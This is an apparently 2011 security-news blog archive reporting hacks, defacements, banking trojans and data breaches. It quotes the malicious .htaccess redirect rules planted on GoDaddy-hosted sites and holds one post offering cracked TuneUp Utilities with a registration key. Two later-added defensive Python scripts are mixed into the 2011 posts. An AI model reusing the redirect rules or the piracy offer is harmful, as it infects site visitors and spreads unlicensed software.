Friday, September 30, 2011

USA Today Twitter Account Hacked By Script Kiddie



         A group calling itself “The Script Kiddies” hacked USA Today’s Twitter account this weekend and used it to solicit requests for future targets and even to promote its own Facebook page. Although this recent hack seems like more of a childish prank, this group is being taken seriously by the FBI due to its earlier hacks involving false terrorism claims posted to NBC’s Twitter account.

           USA Today quickly regained control of the compromised feed. "@usatoday was hacked and as a result false tweets were sent. We worked with Twitter to correct it. The account is now back in our control," it said. "We apologize for any inconvenience or confusion caused to our readers and thank you for reading @usatoday."

           It’s possible that the new USA Today hack involved a spyware Trojan horse, like the earlier NBC hack did. For the NBC hack, NBC News’s director of social media Ryan Osborn could have received a Trojan horse containing a keylogger via email, which then captured passwords as they were typed into his computer.

           The Facebook page allegedly operated by the Script Kiddies is still live, but their @script_kiddiez_ Twitter feed has been suspended.

Atlanta IT Worker Hacked Ex-Employer's Database



          An Atlanta man could receive up to five years in prison after pleading guilty Wednesday to hacking into a former employer’s patient database, stealing information and then wiping the database clean. Federal prosecutors said Eric McNeal, 37, used the patient information from a firm identified as “A.P.A.” for a direct marketing campaign at his new employer in the same building. McNeal was an information technology specialist for the perinatal medical practice in Atlanta in November 2009 when he left to join the competing perinatal practice.

           McNeal used his home computer to hack into his former employer in April 2010, prosecutors said in a release. He downloaded patients’ names, addresses and telephone numbers and then cleared his former employer’s database, deleting all patient information from its system, prosecutors said. While he used the information for a direct-mail marketing campaign for the benefit of his new employer, there was no evidence McNeal misused the personal information he obtained, prosecutors said.

50000 WordPress Sites infected with spam

          The attack consists of contacting the domain wplinksforwork.com to get a list of links to be displayed on the compromised sites. However, that domain has been down for the last few days, so the compromised sites display an error message instead. Most of the hacked sites had outdated versions of WordPress installed.

Infected sites show the following message in the footer:
Warning: file_get_contents(http://wplinksforwork.com/56132.. 47509328/p.php?host=… failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in ..

Mac trojan poses as PDF to open botnet backdoor

          There's another Mac OS X Trojan out in the wild, and it might be heading your way. If you open the file, which could appear as an emailed attachment or as a Web link, the document, written in traditional Chinese ideograms, does indeed display. But a Trojan silently installs itself in the background as you try to sort out centuries-old territorial claims. The Trojan doesn't really do anything yet. But F-Secure, the Finnish security firm that discovered it, notes that it lays the groundwork for much more sophisticated attacks against Macs.

           The malware in question has been identified as Trojan-Dropper:OSX/Revir.A, which installs a backdoor, Backdoor:OSX/Imuler.A, onto the user's Mac. Currently, however, the backdoor doesn't communicate with anything. The command-and-control center for this particular malware is apparently a bare Apache installation, which has been sitting at its current domain since May of this year. Because of this, users who might fall victim to this attack aren't likely to see many ill effects for the time being, but that could change if the files end up spreading to a wider audience.

           Usually, backdoors are employed to communicate with a remote command-and-control (C&C) server, which is capable of instructing the payload to siphon off data from the infected computer back to the attackers. However, F-Secure found that the C&C server is a bare Apache installation, not yet capable of communicating with the backdoor.

75 Indian Govt and University Sites hacked including Patiala Police by Muslim Liberation Army


 
          Muslim Liberation Army hackers today hacked 75 more Indian websites, including government, university and police websites. The Patiala Police website is one of the hackers' targets. List of all hacked sites is here. According to the deface page, the hackers are: XtReMiSt, KillerMind Haxor, Jerry Hassan, Mindy, Faisy Ali Laghari.

Harvard University website hacked by Syria protesters

          Syrian hackers have hit the website of Harvard University, one of America’s top universities, Itar-tass reports. Along with a picture of Syrian president, Bashar al-Assad, the hacked home page showed a message saying the "Syrian Electronic Army Were Here".

           "The university's homepage was compromised by an outside party this morning. We took down the site for several hours in order to restore it. The attack appears to have been the work of a sophisticated individual or group," said a Harvard spokesman. The hackers also criticized US policy towards President Assad's regime and wrote several threats to the US. The new design stayed on the website for nearly an hour.

Thursday, September 29, 2011

700,000 InMotion Websites Hacked

          InMotion's data center got hit by the hacker that calls himself TiGER-M@TE, leaving a few hundred thousand website owners with nonfunctional pages. He is also the one responsible for the attack carried out on Google Bangladesh.

          “At around 4am EST, our system administration team identified a website defacement attack affecting a large number of customers. We are still investigating, but it appears that files named index.php have been defaced,” InMotion representatives said. The hacker claims to be working alone, with a modus operandi limited to private exploits and zero-day attacks.

         "I hack 700000 websites in one shot, this may be a new world Record. After submitting 200,000 domains, zone-h was going down again and again and became almost unresponsive in the end. So I was unable to submit all websites. So I've listed all domains in attachment. It was not just a server hack, actually whole data center got hacked," the cybercriminal revealed.

           It seems that he didn't do much harm to the websites, only replacing the index file on each with his own. The hosting company has already started the repair process, guiding members who possess the necessary knowledge to make the repairs themselves. “If you have a backup of your site, you may upload your index.php files to correct this. You may need to do this for each directory. If your site uses an index.html or index.htm, you will need to upload those files, then delete the index.php,” a press release stated.

           After a few hours the company successfully restored 65% of the affected pages, urging users to refresh their browsers if they're still viewing the hacked site. At the time of this writing, most repairs should be done by their automated system, the remaining issues being addressed in the upcoming days. Customers who see a directory listing instead of their website are advised by InMotion to upload a backup copy to their domain host.

Over 70% of small businesses have not tested their websites for cyber security: Survey

          Over 70% of small businesses (SBs) in the US have not tested their websites for cyber security, while 27% of business owners have had an outside party to test their computer systems to ensure they are hacker proof, according to SB Authority Market Sentiment Survey by Newtek Business Services.

          Based on the poll of approximately 1,200 respondents, the survey found that 39% of business owners do not have their data backed up in more than one location. With recent breaches of security at Citi Bank, Sony and The Pentagon, small business owners should be concerned and take precautions to ensure their confidential business information is protected.

          The survey demonstrates that very few business owners have taken a necessary precaution of having a professional data security firm perform a current assessment of vulnerabilities on their commercial website or database applications.

          The survey found that 65% of business owners seem unaffected by natural disasters, while 61% seem to think their data is backed up in multiple locations. "We believe that small to medium sized business owners need to review all aspects of their data security and disaster recovery efforts," Sloane said.

Over 200,000 Britons victims of online romance frauds: Soca

          Soca warned in the report that online dating scams are growing and the crime watchdog has warned people to be careful of emails or messages that have romantic overtures in them. Soca said that the study found that cyber criminals pose as would-be romantic partners on dating sites and dupe people after taking money from them. Such criminals have a fake online identity, found the study.

          Soca said in a statement, "Fraud is not a victimless crime and romance fraud is just one example of how devastating fraud can be to men and women. Romance fraudsters target people who use internet dating, social web sites and newspaper personal columns. By feigning romantic interest romance fraudsters first secure their victims' trust then exploit the relationship to steal personal information and money, leaving their victims financially and emotionally devastated."

         The study found 2% of people surveyed personally knew someone who had experienced an online dating scam. The figure translates into over 200,000 potential victims of the total online UK population. Soca estimates that the number of unreported cases is likely to be far higher as individual losses range from £50 to £240,000. Moreover, such frauds mostly go unreported.

          Leicester University psychologist and professor of contemporary media Monica Whitty said there could be many more victims in the survey as people often learn late that they have been duped in such scams. "A lot of people find it very hard to accept what has happened, even if they know the person involved is now in jail," Whitty said. Whitty added that targets were from both genders and all age groups. "We've had male victims who still refer to the other person as 'she', even though they now know it was a man. In a few cases they've found the relationship so therapeutic they keep it going, even if they know they've been conned."

          "The perpetrators spend long periods of time grooming their victims, working out their vulnerabilities and when the time is right to ask for money," he said. "By being aware of how to stay safe online, members of the UK public can ensure they don't join those who have lost nearly every penny they had, been robbed of their self-respect, and in some cases, committed suicide after being exploited, relentlessly, by these criminals."

Tuesday, September 27, 2011

Underground Radar: Possible Compromise of MySQL.com and its Subdomains


         We recently found an interesting post in a Russian underground forum in the course of our research. People exchange information about their illegal activities in these kinds of forums. We found a user in the forum with the handle ‘sourcec0de’ and ICQ number ‘291149’ who is currently offering root access to some of the cluster servers of mysql.com and its subdomains.
          The screenshot above shows that the seller appears to have a shell console window with root access to these servers. The price for each access starts at $3,000 USD, with the exchange of money/access being provided by the well known garant/escrow system, whereby a trusted third party verifies both sides of the transaction.

          In our previous underground research, we have also seen the user ‘sourcec0de’ selling stolen PayPal accounts and discussing the management of botnet command and control servers. We contacted MySQL.com about this issue last week. We are making this public to stress the fact that hackers do not only profit from selling stolen data or by inserting bad links into spammed or phishing messages, websites and other possible infection vectors.

          In this case, whether sourcec0de’s claim is true or not, it shows how cybercriminals are so brazen as to sell admin access to specific systems, which could be negatively impacted by their break-ins.

Saturday, September 24, 2011

TuneUp Utilities 2011 : Full Version with Registration Key



TuneUp is an Awesome Windows Tweaking and Performance Enhancement tool
There are hundreds of free trials available over the wire..
But PC Sneakers don't believe in Free Trials... ;)
So herez the full version for you...
Installation and Activation Instructions in the Readme file...
So Download the Archive, Extract and enjoy..


Download Securely from Here [18.85Mb]

Monday, September 19, 2011

Intelligence and National Security Alliance (INSA) hacked




          On Wednesday, 48 hours after releasing a policy paper on cybersecurity, the top trade association for intelligence contractors got a first-hand lesson on the subject: they discovered that their website was hacked.

           Cryptome, a site affiliated with the hacker collective Anonymous, published the membership emails and phone numbers and in some cases home addresses for the members of the Intelligence and National Security Alliance (INSA). By clicking on a link titled, “INSA Nest of Official and Corporate Spies,” anyone can find contact information for senior officials at the NSA, FBI, and CIA, as well as top national security contracting firms like Booz Allen Hamilton.

           The apparent cyberattack on the Intelligence and National Security Alliance, or INSA, is the latest example of the ability of hackers to penetrate the computer systems of government agencies and private companies — including those that pride themselves on their savvy and expertise in cybersecurity.

INSA is only the latest example of how the intelligence community and its affiliated contractors have been hacked by increasingly brazen hackers. On July 11, Anonymous published some 90,000 emails and login credentials for U.S. military officers after breaking into the servers of Booz Allen Hamilton. The group published the data on a website called Pirate Bay and announced on Twitter that July 11 was “Military Meltdown Monday.” The month before, another group of hackers called “LulzSec” (who claim to have since disbanded) published internal files from the FBI and claimed to briefly disable the CIA’s public website.

"Due to the nature of our business, INSA takes security very seriously," McCarthy said in a statement. "We are outraged that someone finds it sporting to make private organizational data public, but we are not naïve. It is not a coincidence that this incident happened just two days after INSA's Cybersecurity Council released a report documenting the need for government and the private sector to begin to work together to solve our nation's cyber security vulnerabilities."

Searching for Heidi Klum on Web could land you in hackers' net

          Movie stars and models top the list this year while singers and sports stars are among the safest in McAfee Most Dangerous Celebrities 2011. Searching for model Heidi Klum on the Internet carries a high risk of running into malware-fitted websites and other files such as photos, videos and screensavers, revealed Internet security company McAfee.

          Klum replaced actress Cameron Diaz as the most dangerous celebrity to search for on the Web in McAfee's Most Dangerous Celebrities study. It is a common ploy of cybercriminals to use the names of popular celebrities to lure people to sites that have malware hidden in photos, videos and other popular downloadable files.

           "Anyone looking for the latest videos or pictures could end up with a malware-ridden computer instead of just trendy content," said McAfee. The McAfee study is in its fifth year in a row. McAfee researched most famous people to find the riskiest celebrity athletes, musicians, politicians, comedians and Hollywood stars on the Web. The study revealed that movie stars and models top the "most dangerous" list this year while singers and sports stars are among the safest.

          The McAfee study found that searching for the latest Heidi Klum pictures and downloads yields more than a 9% chance of landing on a website that has tested positive for online threats, such as spyware, adware, spam, phishing, viruses and other malware. The security company said that "fans searching for 'Heidi Klum' or 'Heidi Klum and downloads,' 'Heidi Klum and 'free' downloads,' 'Heidi Klum and photos' and 'Heidi Klum and videos' are at risk of running into online threats designed to steal personal information."

          "Clicking on these risky sites and downloading files like photos, videos or screensavers exposes surfers or consumers to the risk of downloading the viruses and malware," added McAfee. The study also found that Tennis stars Maria Sharapova and Andy Roddick, who came in at No. 13 and No. 14 respectively last year have dropped to No. 44 and No. 56 on this year's list. Singer Justin Bieber was No. 49 this year, followed by Rihanna and Carrie Underwood who were tied at No. 51, and Lady Gaga was No. 58, said McAfee.

Sunday, September 18, 2011

ClickIndia Classifieds network hacked by Sec Indi


          The Sec Indi Security Team has found multiple major flaws on Clickindia.com, one of the biggest classifieds networks. There is a high chance that the ClickIndia system could be damaged or its database stolen. Hackers exploit it via a SQL injection vulnerability.

Saturday, September 17, 2011

SpyEye Trojan stole $3.2 million from US victims, Android users will be next target !

          A Russian cybergang headed by a mysterious ringleader called ‘Soldier’ was able to steal $3.2 million (£2 million) from US citizens earlier this year using the SpyEye-Zeus data-stealing Trojan, security company Trend Micro has reported. Trusteer also reports that an Android variant of Spitmo (SpyEye for mobile) has been discovered. The methodology sounds familiar for those familiar with ZeuS Mitmo and SpyEye Spitmo: infected computers inject a message into targeted netbanks prompting their customers to install software on their phones. Once Spitmo is installed, the SpyEye attacker is able to monitor incoming SMS and to steal MTAN authentication messages.

           "His botnet was able to compromise approximately 25,394 systems between April 19, 2011 and June 29, 2011. And while nearly all of the victims were located in the US, there were a handful of victims spread across another 90 countries," it said in a blog post.

          Over a six month period from January 2011, Trend found that the Soldier gang had been able to compromise a cross-section of US business, including banks, airports, research institutions and even the US military and Government, as well as ordinary citizens. A total of 25,394 systems were infected between 19 April and 29 June alone, 57 percent of which were Windows XP systems with even Windows 7 registering 4,500 victim systems.

          “Compromise on such a mass scale is not that unusual for criminals using toolkits like SpyEye, but the amounts stolen and the number of large organizations potentially impacted is cause for serious concern.”
 
Victims included:
  • US Government (Local, State, Federal)
  • US Military
  • Educational & Research Institutions
  • Banks
  • Airports
  • Other Companies (Automobile, Media, Technology)
  • C&C Infrastructure

          Banking Trojans such as SpyEye and the older Zeus (possibly now merged with SpyEye) have been one of the malware stories of the last year, and have featured in a number of high-profile online crime cases.

          Zeus for Android purports to be a version of Trusteer Rapport security software. This social engineering trick is used in an attempt to convince the user that the application they are installing is legitimate. SpyEye for Android, now detected by Sophos products as Andr/Spitmo-A, uses a slightly different but similar social engineering technique.

          Spitmo was initially detected by F-Secure in April when a variant was used in an attack against a European bank - the Trojan added question fields to the bank's website, asking customers to enter their mobile phone number and the device's IMEI. Sean Sullivan, security advisor at F-Secure, said: “Spitmo.A contains the malicious executable (sms.exe) and another installer, which contains an executable named SmsControl.exe. SmsControl.exe will just display the message ‘Die Seriennummer des Zertifikats: Ü88689-1299F' to fool the user into thinking that the installer was indeed a certificate. The name SmsControl.exe is quite a coincidence, as a variant of ZeusMitmo used the same name for the file containing the Trojan. Faking the Trojan to be a certificate is also a trick that ZeusMitmo has used. However, the code itself looks completely different than in ZeusMitmo.”

Balaji Plus Cloud Antivirus Released - Mix of 32 antivirus Engines for ultra Protection


           Leo Impact has launched the world's first antivirus scanning software that protects your PC from viruses, trojans, spyware, rootkits and other malicious programs (zero day exploits) by using 32+ antivirus engines in the cloud. Most of the time you can install and use only 2 to 3 antivirus products on one system, not more, so virus authors bypass the top antivirus products. Balajiplus is a free service by Leo Impact Security, offered as part of its corporate social responsibility, to protect your digital life using multiple antivirus scanners in the cloud. Collective Intelligence, Balaji Antivirus Plus's proprietary cloud-scanning technology that automatically collects and processes millions of malware samples, lies at the core of Balaji Cloud Antivirus. In recent comparative tests conducted by both AV-Test.org and AV-Comparatives.org, Balaji Antivirus Security's detection and protection scores rank consistently amongst the top security solutions.

The Balajiplus cloud scanner uses the following latest 32+ antivirus engines:
Ad-Aware
ArcaVir
Avast
AVG Anti-Virus
Avira AntiVir Personal
BitDefender Internet Security
BullGuard
VirusBuster Internet Security
ClamAV
COMODO Internet Security
Dr.Web
CA Internet Security
F-PROT Antivirus
F-Secure Internet Security
G Data InternetSecurity 2011
IKARUS Security Software
Kaspersky Internet Security
McAfee Total Protection
Microsoft Security Essentials
ESET NOD32 Antivirus
Norman Security Suite
Norton Internet Security
Panda Cloud Antivirus
Quick Heal
Rising AntiVirus 2011
SOLO ANTI-VIRUS
Sophos AutoUpdate
Trend Micro Internet Security
VirusBlokAda
Vexira Antivirus Scanner
Webroot Internet Security
Zoner AntiVirus client

Why is Balaji Plus unique/safe?
  • Trusted by Trustwave and VeriSign
  • Online scanning module, so there is no need to install any program on your system
  • Totally free and anonymous (your exe files and attachments are auto-deleted and never shared with antivirus companies)
  • It is better than installing and using one antivirus: instant scanning with multiple (32+) antivirus engines using our cloud technology.
  • This is ver 1.1, and we will launch the ver 2.1 engine in the next 2 months with patent-pending technology, so no virus/RAT/Trojan infections on your system
Visit us : http://balajiplus.com

GoDaddy websites Compromised with Malware

          Many sites hosted on GoDaddy shared servers were compromised today with a conditional redirection to sokoloperkovuskeci.com. In all 445 cases the .htaccess file (a main Apache web server configuration file) was modified to redirect users to a malware site when they were referred by one of a list of search engines. These redirection attacks are very common on outdated WordPress and Joomla sites, but this time (and for this specific malicious domain), we are only seeing them on GoDaddy hosted sites. So it looks like a compromise on their own servers (similar to what has happened in the past).

          This is caused by this entry that is added to the .htaccess file of the compromised sites:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]

           The malware checks whether anyone visiting the infected site is coming from a Google search (or Yahoo, or Bing) and, if they are, redirects them to that domain (sokoloperkovuskeci.com). From there, the user gets redirected again to other locations to get their browsers infected too. So you have to fix your site asap to protect your own users.

          GoDaddy says they are working with customers to resolve the issue, but if you have a GoDaddy account you should check on this, minimally by Googling for your site and following the link (only if your browser is all patched up and you have sufficient other protections). DomainNameWire also smartly recommends that you check with Google, other search engines and security companies to make sure you haven't been blacklisted.
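A safer check than following a search result is to read the .htaccess files directly. The script below is an added example, not part of the original post or GoDaddy's tooling: it flags any RewriteRule that sends visitors to an external host when the preceding RewriteCond lines test the referer against search-engine names. The function names, the `own_hosts` parameter and the benign half of the sample are assumptions made for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlsplit

# Search-engine names to look for inside RewriteCond patterns on the referer.
SEARCH_ENGINES = re.compile(
    r"google|yahoo|bing|msn|live\.com|aol|ask\.com|altavista|excite", re.I)

# First block: the entry quoted in the post, shortened to three conditions.
# Second block: a constructed benign front-controller rule for comparison.
SAMPLE = """RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]

# constructed benign rule
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
"""


def find_referer_redirects(text, own_hosts=()):
    """Return one finding per RewriteRule that redirects search-engine
    referrals to a host not listed in own_hosts."""
    own = {h.lower() for h in own_hosts}
    findings, conds = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            # Conditions accumulate until the RewriteRule they belong to.
            conds.append((parts[1], parts[2]))
        elif directive == "rewriterule" and len(parts) >= 3:
            target = parts[2]
            try:
                host = urlsplit(target).hostname if "://" in target else None
            except ValueError:
                host = None
            engines = sorted({m.lower()
                              for test, pattern in conds
                              if "HTTP_REFERER" in test.upper()
                              for m in SEARCH_ENGINES.findall(pattern)})
            if host and host not in own and engines:
                findings.append(
                    {"line": lineno, "host": host, "engines": engines})
            conds = []  # conditions apply only to the next RewriteRule
    return findings


def scan_tree(root, own_hosts=()):
    """Check every .htaccess file under root; map path -> findings."""
    results = {}
    for path in Path(root).rglob(".htaccess"):
        hits = find_referer_redirects(
            path.read_text(errors="replace"), own_hosts)
        if hits:
            results[str(path)] = hits
    return results


if __name__ == "__main__":
    for hit in find_referer_redirects(SAMPLE):
        print(hit)
```

Run `scan_tree` against the web root of each hosted site and pass the site's own hostnames in `own_hosts` so that legitimate canonical-host redirects are not reported.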

Thursday, September 15, 2011

New Internet banking Trojan identified..!! :-(

          'Shylock' targets UK banks by modifying traffic during an online banking session, says Trusteer. Security company Trusteer has discovered a new Internet banking Trojan targeting the customers of around six UK banks.

          The security company, which supplies its Rapport security product to several UK banks, including HSBC, RBS and Santander's UK operations, said that the malware Trojan attacks by sitting silently on the browser and monitoring online transactions, according to SearchSecurity. The malware makes use of clever new techniques to avoid detection and removal.

          Trusteer has dubbed the malware 'Shylock', after the moneylender in Shakespeare's Merchant of Venice. Shylock famously demanded his "pound of flesh" from the protagonist as an alternative to clear an unpaid debt. Trusteer said that the malware first gets installed in the banking customer's Internet browser. As soon as the Trojan detects an online banking session, it allows a hacker to steal login information, and also modify the traffic between the bank and the customer.

          "Shylock sits in the browser. It can passively monitor the user's traffic, or it can modify the traffic in transit," said Trusteer CTO Amit Klein. "For example, if you log into a targeted bank, it can record your login information, it can record the contents of the page returned from the bank's Web server - such as your bank balance - or it could modify the page before it is rendered on the screen," Klein added.

Typo errors in email addresses could land corporates in hackers' net

          Sophos researchers capture 120,000 emails intended for Fortune 500 companies by exploiting a basic typo such as "missing dot". Basic typo errors in email addresses could be exploited by hackers to gather sensitive information such as trade secrets of corporates, according to computer security company Sophos.

          Security researchers found in a probe that cyber thieves could exploit typo errors such as a missing dot in an email address to grab as much as 20GB of data made up of 120,000 wrongly sent messages over a period of six months. Companies use dots to separate the words in a sub domain. And usually a message bounces to the sender if an address is typed with one of the dots missing. However, researchers managed to net such emails by setting up similar doppelganger domains.

          Web consultant Mark Stockley wrote on the blog of Sophos that it is striking that the researchers managed to capture so much information by focusing on just one common mistake. "A determined attacker with a modest budget could easily afford to buy domains covering a vast range of organisations and typos," he said. The company revealed that researchers have captured 120,000 emails intended for Fortune 500 companies by exploiting a basic typo. The emails included trade secrets, business invoices, personal information about employees, network diagrams and passwords.

          Researchers Peter Kim and Garrett Gee did this by buying 30 Internet domains they thought people would send emails to by accident. The practice is known as typosquatting, said Stockley. The domain names they chose were all identical to subdomains used by Fortune 500 companies - including Dell, Microsoft, Halliburton, PepsiCo and Nike -- save for a missing dot. Users mistakenly sent them over 120,000 emails in six months. Stockley revealed that emails thus collected included "some worryingly sensitive corporate information, including: passwords for an IT firm's external Cisco routers; precise details of the contents of a large oil company's oil tankers; and VPN details and passwords for a system managing road tollways."

          The researchers warn that such typosquatting could be easily turned into an even more dangerous man-in-the-middle attack. Such an attack would have allowed them to capture entire email conversations rather than just individual stray emails, said Stockley. He said, "To perform a man-in-the-middle attack an attacker would simply forward copies of any emails they receive to the addresses they were supposed to go to in the first place. The forwarded emails would be modified to contain bogus return addresses owned by the attacker. By forwarding and modifying emails in this way the attacker establishes themselves as a silent relay between all the individuals in the conversation."
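A mail administrator can check for this exposure from the sending side. The script below is an added example, not code from Sophos or the researchers: for each of an organisation's own mail subdomains it derives the "missing dot" doppelganger domain and flags outbound recipients whose address falls under one. The function names, example.com, the subdomain list and the recipient list are constructed for illustration, and the organisation's registrable domain is assumed to be supplied by the caller.

```python
def doppelganger(fqdn, org_domain):
    """Return (doppelganger_domain, real_parent) for a subdomain of
    org_domain, or None if fqdn is not a subdomain of it.

    Dropping the dot between the last subdomain label and the organisation's
    domain yields a different registrable domain: us.example.com becomes
    usexample.com, which anyone can register.
    """
    fqdn = fqdn.lower().rstrip(".")
    org_domain = org_domain.lower().rstrip(".")
    suffix = "." + org_domain
    if not fqdn.endswith(suffix):
        return None
    label = fqdn[: -len(suffix)].rsplit(".", 1)[-1]
    if not label:
        return None
    return label + org_domain, label + suffix


def build_watchlist(subdomains, org_domain):
    """Map each doppelganger domain to the real subdomain it imitates."""
    watch = {}
    for fqdn in subdomains:
        pair = doppelganger(fqdn, org_domain)
        if pair:
            watch.setdefault(pair[0], pair[1])
    return watch


def flag_recipients(recipients, watchlist):
    """Return (address_as_typed, address_probably_intended) for every
    recipient whose domain is a doppelganger or a subdomain of one."""
    flagged = []
    for addr in recipients:
        local, _, domain = addr.rpartition("@")
        domain = domain.lower().rstrip(".")
        for doppel, real in watchlist.items():
            if domain == doppel or domain.endswith("." + doppel):
                # Keep any leading labels (e.g. "mail.") and restore the dot.
                intended = domain[: len(domain) - len(doppel)] + real
                flagged.append((addr, f"{local}@{intended}"))
                break
    return flagged


if __name__ == "__main__":
    # Constructed inventory and constructed outbound recipient list.
    watch = build_watchlist(
        ["us.example.com", "mail.emea.example.com"], "example.com")
    sent_to = [
        "alice@us.example.com",
        "bob@usexample.com",
        "carol@mail.emeaexample.com",
        "dave@example.org",
    ]
    for typed, intended in flag_recipients(sent_to, watch):
        print(f"{typed} -> probably meant {intended}")
```

The watchlist keys are also the domains worth registering defensively or blocking at the outbound mail gateway.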

Linux Foundation & Linux.com multiple servers compromised

          The Linux Foundation has pulled its websites from the web to clean up from a “security breach". A notice posted on the Linux Foundation said the entire infrastructure including LinuxFoundation.org, Linux.com, and their subdomains are down for maintenance due to a security breach that was discovered on September 8, 2011.

           Multiple Servers that are part of the Linux Foundation & Linux.com infrastructure were affected during a recent intrusion on 8 September which "may have compromised your username, password, email address and other information". 

More from the Linux Foundation announcement:
           We are in the process of restoring services in a secure manner as quickly as possible. As with any intrusion and as a matter of caution, you should consider the passwords and SSH keys that you have used on these sites compromised. If you have reused these passwords on other sites, please change them immediately. We are currently auditing all systems and will update this statement when we have more information.

           We apologize for the inconvenience. We are taking this matter seriously and appreciate your patience. The Linux Foundation infrastructure houses a variety of services and programs including Linux.com, Open Printing, Linux Mark, Linux Foundation events and others, but does not include the Linux kernel or its code repositories.

           The kernel.org site is still offline after that compromise which was discovered on August 28th. The Linux Foundation's servers, linuxfoundation.org and linux.com, and services associated with them such as Open Printing, Linux Mark and Foundation events, are all offline while the administrators perform a complete re-install on the systems. In the meantime the Foundation is advising users to regard any passwords and SSH keys used on these sites as compromised, and they should be immediately changed if they were used on other sites.

NBC News Twitter account hacked, fake 9/11 news posted

          Hackers have broken into the Twitter account of NBC News and posted messages claiming that there has been a terrorist attack at Ground Zero in New York. Coming two days before the tenth anniversary of the 9/11 attacks, the prank by a group calling themselves the 'script kiddies' was greeted with widespread opprobrium from other Twitter users.

          "Breaking News! Ground Zero has just been attacked. Flight 5736 has crashed into the site, suspected hijacking. More as the story develops," was the first tweet this afternoon. It was followed by two others, including one that started "This is not a joke." The fourth tweet said "NBCNEWS hacked by The Script Kiddies."

          Luke Russert, who covers politics for NBC News, also tweeted: "Please ignore NOT TRUE tweets coming from @NBCNews. We got hacked by tasteless despicable attention seeking criminals." Some experts suspect that the Script Kiddies, who are thought to have hacked a Fox News account two weeks ago, are British, although this had not been confirmed.

Panda Security (Pakistan domain) hacked by X-NerD

          The website of Panda Security, one of the famous computer software companies, got hacked. The Pakistan domain of Panda Security was hacked by the Pakistani hacker "X-NerD", who is from the Pakistan Cyber Army team of hackers. The hacker's taunt on the deface page read: "OoooOOPss...I am ShockeD At YouR SecuritY..S3cuR!tY L3vEL Z3r0...YOu Dont KnoW HOw To SecurRe Your AsS n Pr0vidinG SEcurity to 0therS...Big LauGh...".

uTorrent & BitTorrent Sites Hacked, Spread Security Shield Malware


           Attackers hijacked two popular Torrent websites "bittorrent.com and utorrent.com" and tampered with their download mechanisms, causing visitors trying to obtain file-sharing software to instead receive malware. The site reported on its blog that the attack had occurred at around 04:20 Pacific Daylight Time (11:20 GMT) on Tuesday. Initially, the incursion was also thought to have affected the servers of the main BitTorrent site, but further investigation revealed this site had been unaffected by the attack.

           Once installed, Security Shield delivers false reports that a computer is infected with multiple pieces of malware and prompts the user for payment before claiming to disinfect the machine. The attack affected only users who downloaded and installed software from bittorrent.com and utorrent.com during the hour-and-fifty-minute window that the sites were compromised. Those who installed software previously are unaffected.

           "We have completed preliminary testing of the malware. Upon installation, a program called ‘Security Shield" launches and pops up warnings that a virus has been detected. It then prompts a user for payment to remove the virus. " experts write on the blog.

           It is important to note once more that only users who downloaded the software between 4:20 a.m. and 6:10 a.m. Pacific time are infected. If you downloaded it previously, you can rest assured your software is clean.

Wednesday, September 14, 2011

Hacker accesses 40,000 credit and debit cards processed by arcade vendor

      Vacationland Vendors, a Wisconsin-based supplier of arcade equipment and vending machines, said credit and debit cards used in its card processing system over a two-and-a-half-year period may have been exposed.

          Vacationland Vendors discovered that a hacker had gained unauthorized access to its card processing system at Wilderness Resorts in Wisconsin and Tennessee and had access to credit and debit cards processed by its arcade point of sale system from Dec. 12, 2008, to May 25, 2011.

          “Based upon its investigation to date, Vacationland Vendors reasonably believes that a computer hacker improperly acquired credit card and debit information. This incident did not involve an internal security issue within the Wilderness Resort. Vacationland Vendors has learned that other businesses just like its own have been affected by this computer hacker,” the company said on its website.

          The company said it is working with an outside consultant to ensure its card processing systems are secure and protected from further hacking, but it did not indicate whether it was providing affected customers with credit monitoring services. The website announcement did not provide the number of people affected by the data breach, but news reports put the number at up to 40,000.

More than 7.8 million people were victims of healthcare data breaches, says HHS

           More than 7.8 million people had their healthcare information compromised in 252 major data breaches during a 15-month period in 2009 and 2010, according to a recent report to Congress by the Department of Health and Human Services (HHS).

          About half of the major breaches affecting more than 500 people were the result of theft, including stolen electronic equipment such as network components, laptops or hard drives. The largest reported theft affected 1.9 million people, HHS said in its report. This involved the theft of back-up tapes that contained electronic medical records as they were being transported by a vendor to the vendor’s site.

          Of the 99 reported incidents of theft in 2010, 42 involved the theft of laptops. The majority of the incidents involved thefts of laptops onsite while a few incidents involved offsite theft, such as theft of a laptop from an employee’s car. Twenty-one incidents involved theft of desktop computers from onsite locations.
Fourteen incidents were reported as theft of “portable electronic device/other”, which were predominately stolen smartphones and flash drives. Finally, seven incidents were reported as thefts of more than one device, such as a laptop and a desktop computer or a desktop computer and network drive, and five incidents involved theft of a network server.

         Other reported data breach incidents involved intentional unauthorized access to, use, or disclosure of protected health information; human error; loss of electronic media or paper records containing protected health information; and improper disposal of records.

          The HHS report looked at data breaches that occurred between Sept. 23, 2009, when notification requirements under the Health Information Technology for Economic and Clinical Health (HITECH) Act went into effect, and Dec. 31, 2010.

Saturday, September 10, 2011

Cybercrime costs rival those of illegal drug trafficking

          Young males in emerging markets are the most likely to fall victim to cybercrime, whose total cost per year is approaching the scale of illegal drug trafficking worldwide, according to a study by the Norton division of Symantec.

